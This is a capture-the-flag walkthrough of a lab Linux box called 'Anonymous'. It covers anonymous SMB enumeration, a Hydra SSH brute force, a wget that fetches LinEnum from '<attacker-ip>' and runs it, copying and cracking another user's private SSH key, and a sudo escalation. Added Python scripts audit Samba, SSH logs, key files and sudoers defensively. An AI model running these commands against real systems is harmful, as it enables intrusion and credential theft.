SSH Key Exploitation and SMB Recon: A CTF Walkthrough
ToxSec | A real-world-style Linux box. This one challenged me to use sharp enumeration, smart pivots, and creative thinking to gain and escalate access across multiple vectors.
0x00 Introduction
Anonymous is a grindy Linux box that sharpens the muscle memory every OSCP hunter needs: enumerate, pivot, crack, escalate.
The path is straightforward but deliberate:
SMB leaks usernames.
Hydra turns one of them into SSH creds.
Home directories reveal an SSH key.
Cracking the key lands a second user.
Sudo rules finish the job.
No gimmicks, no exotic exploits — just fundamentals stacked together. This is the kind of workflow that wins both in CTF labs and real-world pentests.
Sidebar: Why SMB Still Matters in 2025
It’s tempting to treat SMB as “old news,” but it’s still one of the most common misconfigured services on enterprise networks.
Legacy creep: SMB shares persist because file servers rarely get cleaned up.
User leaks: Even when files aren’t valuable, shares often spill usernames — the first step toward credential attacks.
Cross-pivoting: SMB enumeration on one system often hands you accounts that work elsewhere.
In CTFs like Anonymous, SMB gives you just enough to move forward. In the wild, it’s often the exact breadcrumb that cracks open Active Directory.
0x01 Initial Enumeration
First step: full port scan.
nmap -sC -sV -T4 -p- 10.10.44.87
Results lit up:
22/tcp open ssh OpenSSH 7.2p2
80/tcp open http Apache 2.4.18
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8009/tcp open ajp13
8080/tcp open http-proxy
Plenty to poke at, but SMB stood out as the fastest lead.
List shares:
smbmap -H 10.10.44.87
Output (trimmed):
Anonymous READ ONLY
IPC$ NO ACCESS
Connect:
smbclient //10.10.44.87/Anonymous -N
Inside the share:
staff.txt
Grab and read:
get staff.txt
cat staff.txt
Usernames recovered:
jan
kay
That’s your first real foothold. Even without passwords, valid usernames give Hydra something to aim at.
Sidebar: Harvesting Users from SMB
Files aren’t always the win — the usernames are.
Scan SMB shares for staff/user lists and naming conventions.
Dead-end docs often contain initials, email handles, or password hints.
“Boring” loot starts real chains.
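On the defensive side of this same breadcrumb: the share that handed over staff.txt was reachable with a null session (smbclient -N), and that is a configuration choice, not a vulnerability. The script below is an added example (not from the original walkthrough or from the Anonymous box): it parses a Samba smb.conf and reports which shares an unauthenticated client can open, then lists the [global] settings that would refuse anonymous connections outright. The smb.conf content is constructed for illustration.

```python
"""Audit a Samba smb.conf for shares reachable without credentials.

Added example (not from the original walkthrough): it reads the kind of
configuration that lets `smbclient //host/share -N` succeed, as on the
Anonymous share above, and reports which shares a null session can reach.
"""
import re

# Constructed sample config: not the target box's real smb.conf.
# Samba treats only lines *beginning* with '#' or ';' as comments.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   ; unknown usernames fall through to the guest account
   map to guest = Bad User
   restrict anonymous = 0

[Anonymous]
   path = /srv/samba/anonymous
   guest ok = yes
   read only = yes
   browseable = yes

[finance]
   path = /srv/samba/finance
   valid users = @finance
   read only = no
"""

TRUTHY = {"yes", "true", "1"}

def parse_smb_conf(text):
    """Return {section: {key: value}} with keys lowercased.

    Samba keys are case-insensitive and may contain spaces, so a small
    hand parser is used instead of configparser."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        m = re.fullmatch(r"\[(.+?)\]", line)
        if m:
            current = m.group(1)
            sections[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        sections[current][key.lower()] = value
    return sections

def guest_exposed_shares(conf):
    """List (share, writable) pairs an unauthenticated client can open.

    A share is reachable by a null session when it sets `guest ok = yes`
    (synonym: `public = yes`) unless the server sets `restrict anonymous = 2`,
    which refuses anonymous connections entirely. `map to guest = Bad User`
    widens exposure further by treating unknown usernames as guest."""
    g = conf.get("global", {})
    if g.get("restrict anonymous", "0").strip() == "2":
        return []
    findings = []
    for name, opts in conf.items():
        if name.lower() in ("global", "printers", "print$"):
            continue
        guest = opts.get("guest ok", opts.get("public", "no")).lower() in TRUTHY
        if not guest:
            continue
        # `read only` defaults to yes; `writable`/`writeable` are its inverse.
        writable = (opts.get("read only", "yes").lower() not in TRUTHY
                    or opts.get("writable", opts.get("writeable", "no")).lower() in TRUTHY)
        findings.append((name, writable))
    return findings

def recommended_global_changes(conf):
    """Compare [global] against settings that refuse null sessions outright.

    Returns {setting: (current_value, recommended_value)} for each mismatch;
    Samba's defaults are used when a setting is absent."""
    g = conf.get("global", {})
    defaults = {"map to guest": "Never", "restrict anonymous": "0"}
    wanted = {"map to guest": "Never", "restrict anonymous": "2"}
    return {k: (g.get(k, defaults[k]), v) for k, v in wanted.items()
            if g.get(k, defaults[k]).lower() != v.lower()}
```

Run it over a real smb.conf and every share it lists is one whose file listing, and whatever usernames those files leak, needs no password at all; the finance share drops out because `valid users` gates it.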
0x02 Foothold — Brute Force to Shell
With jan and kay in hand, test SSH. Hydra does the heavy lifting:
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.44.87
Hit confirmed:
[22][ssh] host: 10.10.44.87 login: jan password: armando
Log in:
ssh jan@10.10.44.87
First blood:
cat ~/user.txt
Expand visibility. Stage LinEnum to map local privilege landscape:
wget http://<attacker-ip>:31337/LinEnum.sh -O /dev/shm/LinEnum.sh
chmod +x /dev/shm/LinEnum.sh
/dev/shm/LinEnum.sh
Sidebar: Brute Force vs. Password Spraying
Brute force: One account, many guesses. Great in labs, noisy in prod.
Password spraying: Few smart guesses, many accounts. Quieter, often better.
Why it works IRL:
“Season+Year” patterns still show up (Spring2025!).
Lockouts fire quickly; spraying dodges thresholds.
Credential reuse is rampant across services.
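The two patterns in this sidebar look different in the logs, and that difference is what a defender keys on: a Hydra run against jan is one username with a burst of failures from one address, while a spray is a handful of failures spread over many usernames. The script below is an added example (not from the original post) that reads OpenSSH "Failed password" / "Accepted" lines of the kind sshd writes to auth.log, labels each source address as brute force, spray or benign, and separately flags a password success that follows a run of failures on the same account. The log lines, addresses and thresholds are constructed for illustration.

```python
"""Flag SSH password guessing in auth.log and tell brute force from spraying.

Added example, not from the original post. Scans constructed sshd log lines
and classifies each source address by the shape of its failures.
"""
import re
from collections import defaultdict

# Constructed sample log lines; addresses and users are illustrative.
SAMPLE_AUTH_LOG = """\
Jun  1 10:00:01 box sshd[1201]: Failed password for jan from 10.10.14.5 port 50110 ssh2
Jun  1 10:00:01 box sshd[1202]: Failed password for jan from 10.10.14.5 port 50111 ssh2
Jun  1 10:00:02 box sshd[1203]: Failed password for jan from 10.10.14.5 port 50112 ssh2
Jun  1 10:00:02 box sshd[1204]: Failed password for jan from 10.10.14.5 port 50113 ssh2
Jun  1 10:00:03 box sshd[1205]: Failed password for jan from 10.10.14.5 port 50114 ssh2
Jun  1 10:00:03 box sshd[1206]: Accepted password for jan from 10.10.14.5 port 50115 ssh2
Jun  1 10:05:00 box sshd[1301]: Failed password for kay from 10.10.14.9 port 41000 ssh2
Jun  1 10:05:01 box sshd[1302]: Failed password for jan from 10.10.14.9 port 41001 ssh2
Jun  1 10:05:02 box sshd[1303]: Failed password for invalid user admin from 10.10.14.9 port 41002 ssh2
Jun  1 10:05:03 box sshd[1304]: Failed password for invalid user backup from 10.10.14.9 port 41003 ssh2
Jun  1 10:07:00 box sshd[1400]: Failed password for kay from 10.10.14.20 port 39000 ssh2
Jun  1 10:07:30 box sshd[1401]: Accepted publickey for kay from 10.10.14.20 port 39001 ssh2
"""

# sshd prefixes unknown accounts with "invalid user"; both forms are captured.
FAILED = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)
ACCEPTED = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)

def summarize(log_text):
    """Return {ip: {"failures": {user: count}, "accepted": [(user, method)]}}."""
    per_ip = defaultdict(lambda: {"failures": defaultdict(int), "accepted": []})
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            per_ip[m["ip"]]["failures"][m["user"]] += 1
            continue
        m = ACCEPTED.search(line)
        if m:
            per_ip[m["ip"]]["accepted"].append((m["user"], m["method"]))
    return per_ip

def classify(log_text, min_failures=4, min_users=3):
    """Label each source address 'brute_force', 'spray' or 'benign'.

    brute_force: at least `min_failures` failures piled on a single user.
    spray: failures spread across at least `min_users` distinct users,
    which is checked first because a spray rarely trips per-user lockouts.
    A password login that succeeds after a brute-force run on the same
    account is reported separately, since that is the case to triage first."""
    verdicts = {}
    for ip, data in summarize(log_text).items():
        fails = data["failures"]
        if len(fails) >= min_users:
            label = "spray"
        elif max(fails.values(), default=0) >= min_failures:
            label = "brute_force"
        else:
            label = "benign"
        compromised = [user for user, method in data["accepted"]
                       if method == "password" and fails.get(user, 0) >= min_failures]
        verdicts[ip] = {"label": label,
                        "failures": sum(fails.values()),
                        "distinct_users": len(fails),
                        "password_success_after_failures": compromised}
    return verdicts
```

On the sample, 10.10.14.5 is the Hydra-style burst that ends in a password login for jan, 10.10.14.9 is a spray across four accounts, and 10.10.14.20 is a single typo followed by a key login. Tune the two thresholds to your own baseline; the point is that counting distinct users per source, not just failures, is what separates the quiet spray from the noisy brute force.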
0x03 Pivot — Looting Kay’s Keys
LinEnum didn’t show a clean privesc, but it did spotlight an .ssh directory in kay’s home.
Check it:
ls -la /home/kay/.ssh
Find a private key:
id_rsa
Serve it off the target:
cd /home/kay/.ssh
python3 -m http.server 5555
Pull it to attacker:
wget http://10.10.44.87:5555/id_rsa
Convert and crack the passphrase:
ssh2john id_rsa > id_rsa_for_john.txt
john id_rsa_for_john.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Output: b*****x
Use the key + passphrase:
chmod 600 id_rsa
ssh -i id_rsa kay@10.10.44.87
Second user secured.
Sidebar: SSH Key Hygiene — Why This Still Works
Weak passphrases: If “password123” is bad for SSH, it’s bad as a key passphrase.
Key sprawl: Old keys linger in home dirs and repos.
Cracking is cheap: ssh2john + john tear through weak phrases.
Once a key cracks, you bypass account lockouts and throttling. It’s stealthier and more durable than guessing.
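The hygiene points above are checkable before anyone runs ssh2john against you. An OpenSSH private key file announces in its own header whether it is passphrase-protected: the modern openssh-key-v1 container names its cipher and KDF (`none`/`none` means stored in the clear), and the legacy PEM form marks encryption with a `Proc-Type: 4,ENCRYPTED` line. The script below is an added example (not from the original post or from the Anonymous box) that reads both formats, reports whether a passphrase is in use, and checks file permissions; the sample keys are constructed headers with placeholder key material, so none of them is a usable key.

```python
"""Audit SSH private keys for missing passphrases and loose permissions.

Added example, not from the original post. Reads the two on-disk formats
ssh2john also understands and reports whether a passphrase protects the key.
Sample keys are constructed headers with placeholder key material.
"""
import base64
import os
import stat
import struct

def _ssh_string(b):
    """Encode bytes as the uint32-length-prefixed string the key format uses."""
    return struct.pack(">I", len(b)) + b

def build_sample_openssh_key(cipher, kdf):
    """Construct an OpenSSH private key *header* (constructed test data).

    Only the magic, cipher name and KDF name are real; the key sections are
    placeholder blobs, which is all the audit below looks at."""
    kdfoptions = b""
    if kdf == b"bcrypt":
        kdfoptions = _ssh_string(b"\x00" * 16) + struct.pack(">I", 16)  # salt, rounds
    payload = (b"openssh-key-v1\x00" + _ssh_string(cipher) + _ssh_string(kdf)
               + _ssh_string(kdfoptions) + struct.pack(">I", 1)
               + _ssh_string(b"placeholder-public") + _ssh_string(b"placeholder-private"))
    body = base64.b64encode(payload).decode()
    wrapped = "\n".join(body[i:i + 70] for i in range(0, len(body), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{wrapped}\n-----END OPENSSH PRIVATE KEY-----\n"

# Constructed legacy PEM samples; the body lines are placeholders, not key data.
SAMPLE_PEM_ENCRYPTED = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

cGxhY2Vob2xkZXItY2lwaGVydGV4dA==
-----END RSA PRIVATE KEY-----
"""
SAMPLE_PEM_PLAIN = """\
-----BEGIN RSA PRIVATE KEY-----
cGxhY2Vob2xkZXItcGxhaW50ZXh0
-----END RSA PRIVATE KEY-----
"""

def key_protection(text):
    """Return {"format", "encrypted", ...} for a private key file's contents."""
    lines = text.strip().splitlines()
    if not lines or not lines[0].startswith("-----BEGIN "):
        return {"format": "unknown", "encrypted": None}
    if "OPENSSH PRIVATE KEY" in lines[0]:
        raw = base64.b64decode("".join(l for l in lines[1:] if not l.startswith("-----")))
        magic = b"openssh-key-v1\x00"
        if not raw.startswith(magic):
            return {"format": "openssh", "encrypted": None}
        off = len(magic)
        fields = []
        for _ in range(2):  # ciphername, then kdfname
            (n,) = struct.unpack(">I", raw[off:off + 4])
            fields.append(raw[off + 4:off + 4 + n].decode())
            off += 4 + n
        cipher, kdf = fields
        # cipher "none" means the private section is stored in the clear:
        # a copied key needs no cracking step at all.
        return {"format": "openssh", "cipher": cipher, "kdf": kdf,
                "encrypted": cipher != "none"}
    encrypted = any(l.startswith("Proc-Type: 4,ENCRYPTED") for l in lines[1:4])
    return {"format": "pem", "encrypted": encrypted}

def permission_problem(mode):
    """True when group or others can read the key (ssh itself rejects such files)."""
    return bool(mode & 0o077)

def audit_key_file(path):
    """Combine the content and permission checks for one file on disk."""
    with open(path) as fh:
        report = key_protection(fh.read())
    report["path"] = path
    report["group_or_world_readable"] = permission_problem(stat.S_IMODE(os.stat(path).st_mode))
    return report
```

Point audit_key_file at each id_* file under the home directories you administer; a key that comes back unencrypted is one whose theft is already a login, and an encrypted one is only as strong as the passphrase behind the bcrypt KDF, which is exactly what john was exercising above.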
0x04 Privilege Escalation
As kay, a stray backup_password.txt looked interesting, but it wasn’t needed. The real win was in sudo:
sudo -l
Output (relevant line):
User kay may run the following commands on this host:
(ALL : ALL) NOPASSWD: ALL
That’s game over — full root without a password.
Finish it:
sudo cat /root/flag.txt
Root flag captured.
Sidebar: Sudo Misconfigurations — The Silent Root
Seeing NOPASSWD: ALL means you’re effectively root already. How this happens:
Blanket permissions during troubleshooting, never revoked.
“Trusted user” shortcuts that turn into permanent backdoors.
Sloppy config drift across hosts.
Takeaway: Always run sudo -l. It’s free and often decisive.
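sudo -l shows one user's view; the file behind it can be audited for every user at once. The script below is an added example (not from the original walkthrough) that parses sudoers user specifications of the form `who hosts=(runas) [TAG:] cmds`, which is the grammar behind the `(ALL : ALL) NOPASSWD: ALL` line kay saw, and ranks each rule by how much of root it hands over silently. The sudoers content is a constructed sample, not the box's real file.

```python
"""Rank sudoers rules by how much of root they hand over.

Added example, not from the original walkthrough. Parses user
specification lines from a sudoers file and flags the patterns the
sidebar describes. The sudoers content is a constructed sample.
"""
import re

SAMPLE_SUDOERS = """\
# constructed sample /etc/sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
kay     ALL=(ALL : ALL) NOPASSWD: ALL
jan     ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
backup  ALL=(root) /usr/bin/rsync, /usr/bin/tar
"""

# user_or_%group  hosts = (runas_user[:runas_group]) [TAG: ...] cmd[, cmd...]
RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

def parse_sudoers(text):
    """Return one dict per user specification; Defaults and comments are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        rules.append({
            "who": m["who"],
            "hosts": m["hosts"],
            "runas": (m["runas"] or "").replace(" ", ""),  # omitted runas means root
            "tags": tags,
            "cmds": [c.strip() for c in m["cmds"].split(",")],
        })
    return rules

def assess(rule):
    """Return (severity, reason) for one parsed rule."""
    any_cmd = "ALL" in rule["cmds"]
    runas = rule["runas"]
    can_be_root = runas in ("", "root") or runas.split(":")[0] == "ALL"
    nopasswd = "NOPASSWD" in rule["tags"]
    if any_cmd and can_be_root and nopasswd:
        return ("critical", "passwordless root via any command")
    if any_cmd and can_be_root:
        return ("high", "full root, password still required")
    if nopasswd:
        return ("medium", "passwordless but command-restricted; confirm the listed "
                          "binaries cannot be used to run arbitrary commands")
    return ("info", "command-restricted, password required")

def audit(text):
    """List (who, severity, reason) for every rule except root's own expected entry."""
    return [(r["who"], *assess(r)) for r in parse_sudoers(text) if r["who"] != "root"]
```

On the sample, kay's rule is the critical one from the box, the %sudo group is the normal administrative grant, jan's single NOPASSWD command is the "troubleshooting shortcut" case worth a second look, and backup's rule is the shape a restricted grant should take. Feed it the output of `cat /etc/sudoers /etc/sudoers.d/*` from a config-management run and the critical rows are the drift the sidebar warns about.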
0x05 Debrief + Command Recap
Anonymous is the definition of an OSCP-style target: methodical enumeration, steady credential pivots, and a clean sudo escalation. Nothing flashy — and that’s the point. These are the habits that pay off against real networks.
Chain recap
SMB → usernames.
Hydra → jan SSH.
LinEnum → .ssh find for kay.
ssh2john/john → cracked passphrase.
sudo -l → NOPASSWD: ALL → root.
Command recap
# Recon
nmap -sC -sV -T4 -p- 10.10.44.87
# SMB
smbmap -H 10.10.44.87
smbclient //10.10.44.87/Anonymous -N
get staff.txt && cat staff.txt
# Brute Force
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.44.87
ssh jan@10.10.44.87
cat ~/user.txt
# Local Enum
wget http://<attacker-ip>:31337/LinEnum.sh -O /dev/shm/LinEnum.sh
chmod +x /dev/shm/LinEnum.sh && /dev/shm/LinEnum.sh
# Key Looting & Cracking
cd /home/kay/.ssh && python3 -m http.server 5555
wget http://10.10.44.87:5555/id_rsa
ssh2john id_rsa > id_rsa_for_john.txt
john id_rsa_for_john.txt --wordlist=/usr/share/wordlists/rockyou.txt
chmod 600 id_rsa
ssh -i id_rsa kay@10.10.44.87
# Priv-Esc
sudo -l
sudo cat /root/flag.txt
Sidebar: Why “Boring Chains” Win
Enumerate thoroughly. Don’t skip SMB because it looks dull.
Try defaults first; they’re free.
Check user homes (~/.ssh, configs, creds).
Run sudo -l every single time.
In bug bounty and pentests, most wins come from this exact mindset — not bleeding-edge CVEs, but sloppy configs, reused creds, and forgotten shares. Grind boxes like Anonymous and you’re building the habits that convert.